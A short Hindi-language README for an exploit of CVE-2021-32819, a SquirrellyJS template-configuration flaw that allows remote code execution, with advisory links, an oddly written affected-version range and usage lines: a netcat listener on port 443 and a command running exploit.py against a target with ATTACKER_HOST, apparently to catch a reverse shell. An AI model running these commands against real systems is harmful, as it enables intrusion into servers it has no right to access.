
SquirrellyJS एक्सप्रेस रेंडर API के माध्यम से शुद्ध टेम्पलेट डेटा को इंजन कॉन्फ़िगरेशन विकल्पों के साथ मिश्रित करता है। आंतरिक कॉन्फ़िगरेशन विकल्पों को अधिलेखित करके, डाउनस्ट्रीम अनुप्रयोगों में दूरस्थ कोड निष्पादन को ट्रिगर किया जा सकता है।
CVE-2021-32819 : SquirrellyJS शुद्ध टेम्पलेट डेटा को Express रेंडर API के माध्यम से इंजन कॉन्फ़िगरेशन विकल्पों के साथ मिलाता है। आंतरिक कॉन्फ़िगरेशन विकल्पों को ओवरराइट करके, डाउनस्ट्रीम अनुप्रयोगों में रिमोट कोड निष्पादन ट्रिगर किया जा सकता है।
https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
v8.0.0 >= v8.0.8 रिमोट कोड निष्पादन
Ubuntu 20.04.1
nc -lvp 443
python3 exploit.py http://example.com/ ATTACKER_HOST 443
